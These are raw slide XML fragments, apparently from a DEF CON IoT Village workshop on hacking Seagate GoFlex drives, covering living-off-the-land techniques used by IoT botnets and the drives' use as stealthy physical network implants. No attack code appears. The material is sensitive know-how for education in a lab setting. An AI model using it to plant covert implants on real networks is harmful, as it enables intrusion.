            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ash for command execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: For network connections and data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: For persistence and scheduled tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Legitimate Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Telnet/SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Default or weak credentials exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TFTP/FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Downloading additional payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP/HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Command and control communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Covert channels for C2 communications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76328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E14E-8AC2-CD39-EECF-4A39C505007C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IoT Botnets – Myth vs Reality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0FB60B1-229F-584A-784C-6630F03EFB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820848" y="1825625"/>
            <a:ext cx="5480364" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IoT botnets extensively use Living off the Land techniques because IoT devices typically have limited resources and security controls, making them ideal targets for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Resource Efficiency</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>No need to upload large malware files to memory-constrained devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Uses existing binaries, saving precious storage space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Minimal CPU usage by leveraging native tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Detection Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>IoT devices rarely have antivirus or EDR solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Limited logging capabilities make forensics difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Network traffic appears legitimate (using standard protocols)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7AFA2BD-EEB5-1BC2-18BA-665991621490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301212" y="1825625"/>
            <a:ext cx="5596330" cy="3367087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1A5E35-FC41-FC1F-31CB-E1630EEA816B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301212" y="5327649"/>
            <a:ext cx="5764582" cy="1661993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Real-World Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Mirai and Variants - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Used built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> to download stages / Leveraged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>BusyBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> utilities for spreading / Employed legitimate networking tools for DDoS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Hide and Seek (HNS) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Used native peer-to-peer communication capabilities / Leveraged built-in scripting for self-propagation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180103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77205-BBAA-A695-BDF1-79D3D75C1EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution - Building your Skillset and Lab on a Budget</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBDBE54-18BC-BC0C-1754-A72EE3016509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1816916"/>
            <a:ext cx="5919651" cy="4923518"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build it yourself. No legal issues, no internet issues, you can choose to learn / hack on something you know exists.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor Firmware – Known Vulnerable, Not easy to find but a good exercise for learning / hacking / recreation) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>How to manually update firmware on a Wireless Plus or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>GoFlex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Satellite | Seagate US</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Upgrade / Reflash using a firmware built for this. (Good for building a lab, stealth implants, fewer vulnerabilities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OpenWrt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Wiki] Seagate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>GoFlexHome</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debian – Upgrade / Reflash using a firmware built for this. Good for offensive implants / simulating IoT botnets / honing your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> skills.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this, we’re going to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316B5A87-E13D-C37A-2D24-2B0AA5CAFC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6941772" y="1690688"/>
            <a:ext cx="2930891" cy="3945731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2137912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2860-2887-3BF8-01AE-00473964CE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Awesome Implants &amp; Stealth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D790E7A-EEF0-83FD-3A15-508894B70BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144725" y="1552506"/>
            <a:ext cx="6799283" cy="4642563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many people would *seriously* notice or think a portable hard drive is a physical implant device? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Devices are minimal, infinitely hackable, nearly impossible to completely brick. If you want to learn IoT hacking and basic hardware skills, it’s a great platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Low wattage, high storage, small form factor, modular.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cryptosupport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and wireless in certain configurations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nearly infinite supply of these – UPCYCLE! REDUCE E-WASTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Hiding in network plain sight” – Fun with old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDnS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> networks and Domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96177974-E222-D57F-AF80-D978D93EF033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7203367" y="1843731"/>
            <a:ext cx="4741171" cy="3942784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3773945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50E3-482E-EEA4-1E94-6A4443F6D69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sources to Find Them:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511F9D0E-7FEF-29A5-CC76-71C5ACE746BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5257800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various vendors have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EOL’d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the drives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is still a healthy after market:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>eBay / closeout resellers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Hand Stores, Recyclers, Market Listings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Amazon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They’re already proven vulnerable, have a lot of types of issues, can be flashed to anything you need… doesn’t break the law or get you in trouble*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*Funny story.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE1400D4-94CB-3A3B-F2AC-98F9985253CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6147839" y="1690688"/>
            <a:ext cx="5851445" cy="3623176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146422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ADDF1B-32F1-50AF-872B-1679EF1F5998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BE VERY CAREFUL FROM HERE ON. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93698D6F-76B5-7E15-28D5-6F1FA5B9677E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even though all of this is recoverable and we’re working live… it takes some time to recover things. Be careful. This is a controlled environment. Practice good habits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not brick or break the devices. Measure twice, cut once.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1624813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51141-EF16-CC70-7B8C-DA9833CAB558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and download these files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED37E444-6B87-0C95-BBD8-85117E35A3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="6529251" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TFTP Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firmware / Linux Distros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Uboot.kwb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/SYNgularity1/defcon-iotvillage-seagate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will be booting / opening the devices and taking them apart.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C0DABCDD-215A-3E88-7ACF-9F9A8D88916E}"/>
              </a:ext>
